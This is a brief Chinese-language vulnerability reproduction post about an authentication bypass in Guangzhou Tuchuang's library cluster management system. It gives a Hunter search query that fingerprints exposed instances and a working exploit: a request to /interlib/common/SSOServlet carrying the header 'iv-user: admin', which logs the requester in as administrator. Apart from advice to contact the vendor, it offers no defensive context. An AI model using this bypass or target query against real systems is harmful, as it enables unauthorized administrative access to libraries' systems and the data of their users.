【漏洞复现】广州图创图书馆集群管理系统认证绕过漏洞

Nx01 产品简介

????????广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业，主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。

Nx02 漏洞描述

????????广州图创图书馆集群管理系统存在认证绕过漏洞。添加header头iv-user: admin以管理员用户进行登录系统。

Nx03 产品主页

hunter-query: web.body="/interlib/common/"

Nx04 漏洞复现

访问/interlib/common/SSOServlet?添加header头iv-user: admin

/interlib/common/SSOServlet?
iv-user: admin

Nx05 修复建议

建议联系软件厂商进行处理。